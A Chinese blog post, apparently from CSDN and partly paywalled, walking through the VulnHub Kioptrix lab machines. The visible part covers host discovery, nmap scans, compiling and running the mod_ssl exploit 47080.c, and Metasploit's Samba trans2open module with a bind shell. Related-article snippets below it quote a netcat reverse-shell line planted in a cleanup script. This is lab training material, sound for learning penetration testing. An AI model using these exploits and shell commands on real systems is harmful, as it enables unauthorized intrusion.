vlunhub靶机一Kioptrix

最新推荐文章于 2024-05-07 12:06:16 发布
最新推荐文章于 2024-05-07 12:06:16 发布
阅读量1.1k 收藏 4
点赞数
分类专栏: 靶机
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_34640691/article/details/113381861
版权

Kioptrix

目录

Kioptrix

Kioptrix Level 1 (#1)

1.查找靶机ip地址

2.对靶机进行端口扫描

3.1 ssl漏洞利用

3.2samba协议漏洞利用

Kioptrix Level 1.1 (#2)

1.查找靶机ip

2.端口扫描

3.web漏洞

4.提权

Kioptrix Level 1.2 (#3)

1.查找靶机ip

2.端口扫描

3.CMS漏洞利用

4.查找配置文件进入phpmyadmin,ssh登录靶机

Kioptrix: Level 1.3 (#4)

1.查找靶机ip

2.端口扫描

3.对web登录页面进行sql注入

4.ssh登录

5.连接mysql并使用udf提权

 

Kioptrix: 2014

1.靶机ip

2.端口扫描

3.访问80端口,查看页面源代码,访问

查找pChart2.1.3的相关漏洞并利用

4.访问8080端口,查看其它信息

5.查找phptax利用漏洞

6.提权

Kioptrix Level 1 (#1)

1.查找靶机ip地址

nbtscan 192.168.43.0/24       #netbios协议查找
fping -asg 192.168.43.0/24    #icmp协议查找
arp-scan 192.168.43.0/24      #基于arp协议查找

2.对靶机进行端口扫描

nmap -sV -p- 192.168.43.54

3.1 ssl漏洞利用

mod_ssl<2.8.7有远程缓冲区溢出漏洞,查找并利用

searchsploit "mod_ssl"
cp /usr/share/exploitdb/exploits/unix/remote/47080.c .
gcc -o ssl_exp 47080.c -lcrypto    

./ssl_exp 0x6b 192.168.43.54 -c 40    #0x6b为对应的系统

3.2samba协议漏洞利用

(1)msf查找smb版本

search "samba_version"
use auxiliary/scanner/smb/smb_version
set RHOSTS 192.168.43.54
exploit

(2)msf利用漏洞

search samba 2.2
use exploit/linux/samba/trans2open
set payload linux/x86/shell/bind_tcp
set rhost 192.168.43.54
exploit

 

Kioptrix Level 1.1 (#2)

1.查找靶机ip

2.端口扫描

nmap -sV -p- 192.168.43.47

<

最低0.47元/天 解锁文章
kongytr
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
KIOPTRIX: LEVEL 1 (#1)
logan_logan的博客
12-19 504
KIOPTRIX: LEVEL 1 (#1) 1.浏览器输入地址打开,是一个Test page网页,接下来开始进行信息收集; 2.信息收集 2.1 使用namp工具对端口进行扫描 发现apache的版本较老,同时开了samba服务,接下来考虑对这两个信息进行更深入的验证。 2.2 使用gobuster枚举目录 对扫描的目录进行验证之后发现没有多少有用信息; 3.漏洞探测 3.1 apache漏洞探测 在kali里面搜索漏洞,接下来开始进行尝试 3.2 samba漏洞探测 使用msf探测到samba版
vlunhub-Lampiao靶机通关(超详细)
weixin_53730939的博客
01-03 570
vlunhub-Lampiao靶机通关(超详细)
(全网究极无敌详细)vlunhub靶机渗透:HACKME2!
m0_70065235的博客
10-14 205
(究极无敌详细小白一看就会)hackme2靶机渗透报告
2024年网络安全最新Kioptrix level-4 多种姿势 渗透 详解_liggoat secure,不同层级的网络安全开发者的不同行为
最新发布
2401_84296945的博客
05-07 963
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
1-Vlunhub--GIGACHAD
weixin_45873667的博客
06-08 432
前言:小菜鸟在努力 也是学渗透不久,慢慢了解深入,坚持每天能够弄明白一个靶机Vlunhub–GIGACHAD 首先因为虚拟机无法分配IP需要我们手动 配置网卡: 将虚拟机打开: 按e进入编辑模式, 这里显示的网卡是ens33 修改 网卡:vi /etc/network/interfaces 将网络切换为nat模式,获得IP:192.168.159.155 配置好之后重新启动 开始复现: nmap -sn -vv -n -PE 192.168.159.0/24 --min-rate=2000 -s
vlunhub系列之breach靶机
hanjinming110的博客
08-11 416
cat shell.txt nc -e /bin/bash 192.168.110.22 5555 将其成功的写入到这个文件中,我们使用/usr/bin/tee目录,将这个文件写入到/usr/share/cleanup/tiduup.sh中。cat /usr/share/cleanup/tidyup.sh nc -e /bin/bash 192.168.110.22 5555 成功的将脚本写入到找个文件中,等待可执行脚本的运行。
kioptrix_level_1 新手入门级通关攻略
qq_58683895的博客
09-16 664
适用于零基础新人的通关攻略,其中包含涉及到知识点
Kioptrix2-WalkThrough 靶机复现.docx
10-18
Kioptrix2-WalkThrough 靶机复现 本文将对 Kioptrix2 靶机复现的整个过程进行详细的知识点总结,涵盖信息收集、攻击、提权等阶段的关键技术点。 信息收集阶段 在信息收集阶段,我们首先需要对靶机进行 IP 探活,...
Vulnhub靶机系列:Kioptrix: Level 1.2 (#3)
01-09
这次的靶机是Vulnhub靶机Kioptrix: Level 1.2 (#3) 文章目录靶机地址及相关描述靶机设置利用知识及工具信息收集并getshell提权总结 靶机地址及相关描述 https://www.vulnhub.com/entry/kioptrix-level-12-3,24/ ...
E020-渗透测试常用工具-使用w3af进行Web应用安全漏洞测试.pdf
12-02
渗透测试是网络安全领域中的一种重要实践,它模拟黑客攻击行为,检测系统及应用的安全漏洞。在这个过程中,专业工具的使用至关重要。本文主要介绍了一种名为w3af的Web应用安全漏洞测试工具,它是渗透测试人员的常用...
PWN靶机环境 网络安全
05-23
PWN靶机环境
web渗透测试靶机(新手)
05-07
Web渗透测试靶机是针对新手入门的网络安全学习平台,它模拟了实际的Web应用程序环境,让你可以在一个安全可控的环境中实践渗透测试技术。这个靶机通常包含一系列具有不同安全漏洞的Web应用,让学习者通过查找和利用...
【Vulnhub通关】Kioptrix:Level 1 (#1)
icewolf00的博客
01-24 1205
注意:本文转载自本人稀土掘金博客。
vulnhub靶场 Kioptrix-level-1
qq_69775412的博客
10-08 543
简介: vulnhub是一个提供靶场环境的平台。而Kioptrix-level-1就是一个对新手比较友好的靶场。初学渗透的同学可以做做试试看,项目地址如下。
vulnhub Kioptrix: Level 1 (#1)
箭雨镜屋
11-16 1552
本文使用的方法是利用apache mod_ssl 2.8.4的Remote Buffer Overflow漏洞(CVE-2002-0082)getshell并拿到root权限
kioptrix-level-1
热门推荐
cxyzupup的博客
01-10 1万+
kioptrix-level-1-1,22 项目地址:https://www.vulnhub.com/entry/kioptrix-level-1-1,22 提示:靶机网络连接方式使用NAT模式。 文章目录kioptrix-level-1-1,22一、信息收集1. 使用fping工具查找靶机IP:2. 使用nmap对目标主机端口进行枚举:二、信息利用1. 查看80端口:2. 查看443端口:总结 一、信息收集 1. 使用fping工具查找靶机IP: 命令如下: kali@kali:~/Desktop$ fp
渗透日记————Kioptrix Level 1
m0_73700261的博客
04-09 407
扫描端口发现有以下端口开放其中比较重要的有三个端口开放80 22 和139端口。接着使用msf查看版本漏洞接着搜索看看有没有对应的漏洞。sumba端口是Linux系统上的一个免费软件。接着设置攻击靶机ip和对应的payload。cd进入根目录ls一下发现可以成功命令执行。发现靶机ip为:10.102.8.194。是用来为局域网内为不同计算机提供共享服务。发现该sambe服务器为2.2.1a。那么第一步先扫描发现靶机的地址。139端口是一个sumba端口。接着继续搜索历史漏洞。
VulnHub靶场LupinOne
I夜白
02-01 4989
VulnHub靶场LupinOne 这个靶场是一个很好的练习环境,整套渗透流程,用来模拟环境非常合适 直接解压用虚拟机打开就行,不用自己配置,没有账号密码,需要自己一步步来,对了,这是自动获取IP的,不需要自己配置. 一.信息收集 信息收集是很重要的,举个栗子来说,比如约出自己的女神出来玩,肯定向了解女神的经济情况还有喜好嘛,通过她的微信朋友圈,她身边的好友,淘宝等等,了解一个人,就要从最贴近生活的方向开始,就像"只有千日做贼,那有千日防贼",感觉有点不太贴切,意思是差不多的,用这个只是想表达信息收集的重
网络安全攻防靶机建设方案
"网络安全攻防靶机的设计概要涵盖了项目背景、目标、技术和实施细节,旨在构建一个逼真的网络攻防训练环境,以提升信息安全人员的实战能力。该项目由国网xxx电力有限公司xxx供电公司发起,由安徽凌慧信息科技有限...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值